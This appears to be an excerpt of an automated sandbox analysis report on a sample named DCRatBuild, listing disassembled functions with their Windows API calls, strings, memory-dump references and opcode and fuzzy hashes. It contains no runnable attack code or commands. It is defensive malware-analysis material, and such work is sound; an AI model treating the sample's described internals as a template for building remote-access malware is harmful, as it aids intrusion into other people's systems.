                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                        • Instruction ID: fb180a45ea9de62c1a528b91924b008d9a2c8710d12f8f13f329b0319e4eabad
                                        • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                        • Instruction Fuzzy Hash: DD113071541B04FBD6A0BBB0CC0BFDBB79D6F00702F408855BA9966492DBB9F90C8A91
                                        Function 007520CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,007520C1,0074FB12), ref: 007520D8
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007520E6
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007520FF
                                        • SetLastError.KERNEL32(00000000,?,007520C1,0074FB12), ref: 00752151
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: f413d28f4ff59e488476e40051fbf27fb3f5d68ea77363e577adb1e5b7a0e350
                                        • Instruction ID: fd0f81f41d0e195aeac78df4b2f712b9e946fe066dba2036dd3e71d9aca84043
                                        • Opcode Fuzzy Hash: f413d28f4ff59e488476e40051fbf27fb3f5d68ea77363e577adb1e5b7a0e350
                                        • Instruction Fuzzy Hash: C201283620A715EFB7552BB4BC895DB2A44EB227733204629FE10590F2FFDD4C0E9168
                                        Function 00759029 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,0075895F,007585FB,?,00758FD3,00000001,00000364,?,00753713,00000050,?,00770EE8,00000200), ref: 0075902E
                                        • _free.LIBCMT ref: 00759063
                                        • _free.LIBCMT ref: 0075908A
                                        • SetLastError.KERNEL32(00000000,?,00770EE8,00000200), ref: 00759097
                                        • SetLastError.KERNEL32(00000000,?,00770EE8,00000200), ref: 007590A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID: Xv
                                        • API String ID: 3170660625-1716690856
                                        • Opcode ID: e6469545f3836dbf746b22a8575b5fad492bef8d21876564591aac9313d854d1
                                        • Instruction ID: a2b09acf1e62eeed278ea0f329c5ae457f79d78a5129a59eaa482237c1f6fd7b
                                        • Opcode Fuzzy Hash: e6469545f3836dbf746b22a8575b5fad492bef8d21876564591aac9313d854d1
                                        • Instruction Fuzzy Hash: 5201D676605702EB83212734AC899EB255E9BD13733204524FE0EA71D1EFEC8C0D4165
                                        Function 0074DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                        • API String ID: 0-1718035505
                                        • Opcode ID: ebdd9fdc30dce1ba5b9e9b3d9d681758d510f8190a03a800083e5496bc38cdc8
                                        • Instruction ID: f15b0901f182723bcfc3280d8ef202990e4ef501cdb20db6dc58699690c1b33d
                                        • Opcode Fuzzy Hash: ebdd9fdc30dce1ba5b9e9b3d9d681758d510f8190a03a800083e5496bc38cdc8
                                        • Instruction Fuzzy Hash: 0001F471B513229F4F305E746CC52E62794EA42716720927BE982D3200DBADCC85EBF4
                                        Function 00758060 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 0075807E
                                          • Part of subcall function 007584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?), ref: 007584F4
                                          • Part of subcall function 007584DE: GetLastError.KERNEL32(?,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?,?), ref: 00758506
                                        • _free.LIBCMT ref: 00758090
                                        • _free.LIBCMT ref: 007580A3
                                        • _free.LIBCMT ref: 007580B4
                                        • _free.LIBCMT ref: 007580C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID: v
                                        • API String ID: 776569668-2951754918
                                        • Opcode ID: 650c725ee64908b6677c1ec6bccacceeb6c0e301170ed0f3b411d004b3f773df
                                        • Instruction ID: 8002492d3ace47600d560382e200c0e9784f8fdaae45c48b2358d0068fcaea5e
                                        • Opcode Fuzzy Hash: 650c725ee64908b6677c1ec6bccacceeb6c0e301170ed0f3b411d004b3f773df
                                        • Instruction Fuzzy Hash: D9F067B8A02262CB87C16F15BC054853B60F714721348C28BFC15A6A70CFBD087A8FDA
                                        Function 00740CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00740D0D
                                          • Part of subcall function 0073ACF5: GetVersionExW.KERNEL32(?), ref: 0073AD1A
                                        • LocalFileTimeToFileTime.KERNEL32(?,00740CB8), ref: 00740D31
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00740D47
                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00740D56
                                        • SystemTimeToFileTime.KERNEL32(?,00740CB8), ref: 00740D64
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00740D72
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion
                                        • String ID:
                                        • API String ID: 2092733347-0
                                        • Opcode ID: 59510722a6511a1954045955ea0b816948c0c11b99495b760c318a854f8e9410
                                        • Instruction ID: cb63465b60d3139d3821ba98d10e3e47d4cfc49af102a9cabd509fd394d31243
                                        • Opcode Fuzzy Hash: 59510722a6511a1954045955ea0b816948c0c11b99495b760c318a854f8e9410
                                        • Instruction Fuzzy Hash: 8131EA7A90020AEBCB00DFE5C8859EFFBBDFF58700B04455AE955E7210E7349645CB68
                                        Function 007491B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: a05fbd2e07afff9de562b354a90c0abe122a2da3a09e94abc07a326d690517f0
                                        • Instruction ID: b15c3cede02193444221b2d9606ab89db15b78be970ebcb4d40e39644cbdc835
                                        • Opcode Fuzzy Hash: a05fbd2e07afff9de562b354a90c0abe122a2da3a09e94abc07a326d690517f0
                                        • Instruction Fuzzy Hash: 592192B1B4020EBBD7049E11CC81E2B77ADBB50788F108628FD0A9B205E3B8ED4196A1
                                        Function 0074D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0074D2F2
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0074D30C
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0074D31D
                                        • TranslateMessage.USER32(?), ref: 0074D327
                                        • DispatchMessageW.USER32(?), ref: 0074D331
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0074D33C
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 2148572870-0
                                        • Opcode ID: c30d8051379c4612fe49e11d1c25292728b4e23de7ec057a1b52c85cb8180d83
                                        • Instruction ID: cfb03354588987e311b10f598d63f8095c82a39637dd3fa7e1d30fa3951cabca
                                        • Opcode Fuzzy Hash: c30d8051379c4612fe49e11d1c25292728b4e23de7ec057a1b52c85cb8180d83
                                        • Instruction Fuzzy Hash: 13F03C72A0121DBBCB206FA5DC4CEDBBF6EEF51391F008112F646D2011D6788952C7B5
                                        Function 0074C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcschr.LIBVCRUNTIME ref: 0074C435
                                          • Part of subcall function 007417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0073BB05,00000000,.exe,?,?,00000800,?,?,007485DF,?), ref: 007417C2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CompareString_wcschr
                                        • String ID: <$HIDE$MAX$MIN
                                        • API String ID: 2548945186-3358265660
                                        • Opcode ID: 602ff28e0254e97572e09ef864b5eda0d39692f6372595fa9c9a0a2d3c9f634d
                                        • Instruction ID: 7dc0b932a41731165ec005f5b2910a33df6750d24f40bc6fb84b205044be54a2
                                        • Opcode Fuzzy Hash: 602ff28e0254e97572e09ef864b5eda0d39692f6372595fa9c9a0a2d3c9f634d
                                        • Instruction Fuzzy Hash: B2319472A00249AADF62DA54CC55FEA7BBCEB54310F004066FA05D6090EBB99FC4CA50
                                        Function 0074A990 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0073130B: GetDlgItem.USER32(00000000,00003021), ref: 0073134F
                                          • Part of subcall function 0073130B: SetWindowTextW.USER32(00000000,007635B4), ref: 00731365
                                        • EndDialog.USER32(?,00000001), ref: 0074A9DE
                                        • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0074A9F6
                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 0074AA24
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: GETPASSWORD1$xjx
                                        • API String ID: 445417207-132524196
                                        • Opcode ID: 3459561eefa3d0283295f997f48673655bf6871c382f9bc5996713bf9d933cc9
                                        • Instruction ID: 721be1e4578ef189740b97c907c240fb01184e4431e2174a7203ea404210649f
                                        • Opcode Fuzzy Hash: 3459561eefa3d0283295f997f48673655bf6871c382f9bc5996713bf9d933cc9
                                        • Instruction Fuzzy Hash: 2D110833A80118BADB21AA649D09FFB376CEB49700F004021FA45B21D1C37D9956D772
                                        Function 0074ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadBitmapW.USER32(00000065), ref: 0074ADFD
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0074AE22
                                        • DeleteObject.GDI32(00000000), ref: 0074AE54
                                        • DeleteObject.GDI32(00000000), ref: 0074AE77
                                          • Part of subcall function 00749E1C: FindResourceW.KERNEL32(0074AE4D,PNG,?,?,?,0074AE4D,00000066), ref: 00749E2E
                                          • Part of subcall function 00749E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0074AE4D,00000066), ref: 00749E46
                                          • Part of subcall function 00749E1C: LoadResource.KERNEL32(00000000,?,?,?,0074AE4D,00000066), ref: 00749E59
                                          • Part of subcall function 00749E1C: LockResource.KERNEL32(00000000,?,?,?,0074AE4D,00000066), ref: 00749E64
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                        • String ID: ]
                                        • API String ID: 142272564-3352871620
                                        • Opcode ID: dff7a2dc3dac03b3ea16d7e89f76452e026bd0e9cfb96430e9d290c6e9109382
                                        • Instruction ID: 3a0b2fbd4555822695920cddb217404a2eeaf68352bf07804b38873e08f3bc44
                                        • Opcode Fuzzy Hash: dff7a2dc3dac03b3ea16d7e89f76452e026bd0e9cfb96430e9d290c6e9109382
                                        • Instruction Fuzzy Hash: 9A01F932980225F7C71077689C0BA7F7B79AF81B51F094115FE10A7292DF7D8C1696B1
                                        Function 0074CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0073130B: GetDlgItem.USER32(00000000,00003021), ref: 0073134F
                                          • Part of subcall function 0073130B: SetWindowTextW.USER32(00000000,007635B4), ref: 00731365
                                        • EndDialog.USER32(?,00000001), ref: 0074CCDB
                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0074CCF1
                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 0074CD05
                                        • SetDlgItemTextW.USER32(?,00000068), ref: 0074CD14
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: RENAMEDLG
                                        • API String ID: 445417207-3299779563
                                        • Opcode ID: 0aab8f71b2c82756b05824443220272981868aad3bd4f8b997ac226cfefa6d21
                                        • Instruction ID: 61a92ffe14298ff47fb8afbe59509e67e945238ef292752bacc1b807c754ff74
                                        • Opcode Fuzzy Hash: 0aab8f71b2c82756b05824443220272981868aad3bd4f8b997ac226cfefa6d21
                                        • Instruction Fuzzy Hash: 050147327C63107FD6625F689C49F673B6CEB5A702F208421F346A20E1CBAD5906CB79
                                        Function 00752503 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0075251A
                                          • Part of subcall function 00752B52: ___AdjustPointer.LIBCMT ref: 00752B9C
                                        • _UnwindNestedFrames.LIBCMT ref: 00752531
                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 00752543
                                        • CallCatchBlock.LIBVCRUNTIME ref: 00752567
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                        • String ID: /)u
                                        • API String ID: 2633735394-2826551959
                                        • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                        • Instruction ID: d4ac28fb97134b479044220d8921f8580edcfedeec5c368846f5a5a0dd8b8295
                                        • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                        • Instruction Fuzzy Hash: 6A012932000108FBCF129F65CC45EDA3BBAEF5A751F058054FD1866122D3BAE976EBA1
                                        Function 007575C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00757573,00000000,?,00757513,00000000,0076BAD8,0000000C,0075766A,00000000,00000002), ref: 007575E2
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007575F5
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00757573,00000000,?,00757513,00000000,0076BAD8,0000000C,0075766A,00000000,00000002), ref: 00757618
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: cbb692d54b250837a28a7868cad212abd2a50feabcbfdefc4575b3f2b525af52
                                        • Instruction ID: 50702928724ae01fdd9c01f2f1b78a7c29853b313d41480c6ab5ebd7385a3910
                                        • Opcode Fuzzy Hash: cbb692d54b250837a28a7868cad212abd2a50feabcbfdefc4575b3f2b525af52
                                        • Instruction Fuzzy Hash: 06F04F70A0861CBBDB159B94DC09BDDBFB9EF04712F048168FC06A2160DBB88A44DB98
                                        Function 0073EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00740085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007400A0
                                          • Part of subcall function 00740085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0073EB86,Crypt32.dll,00000000,0073EC0A,?,?,0073EBEC,?,?,?), ref: 007400C2
                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0073EB92
                                        • GetProcAddress.KERNEL32(007781C0,CryptUnprotectMemory), ref: 0073EBA2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                        • API String ID: 2141747552-1753850145
                                        • Opcode ID: 76e5649b6f5609f5fc2cfbffff7471a90c6118f993005ae09b206d835d26a3ff
                                        • Instruction ID: d40f1ec3d0bb3f861eb330400990ceb4b0711de5389f682deecc5cd3d0e93f5c
                                        • Opcode Fuzzy Hash: 76e5649b6f5609f5fc2cfbffff7471a90c6118f993005ae09b206d835d26a3ff
                                        • Instruction Fuzzy Hash: 14E046B0800741AEDB229F389808B42FAE4AF14708F04C81DE8D7E3291DAFCE584CF60
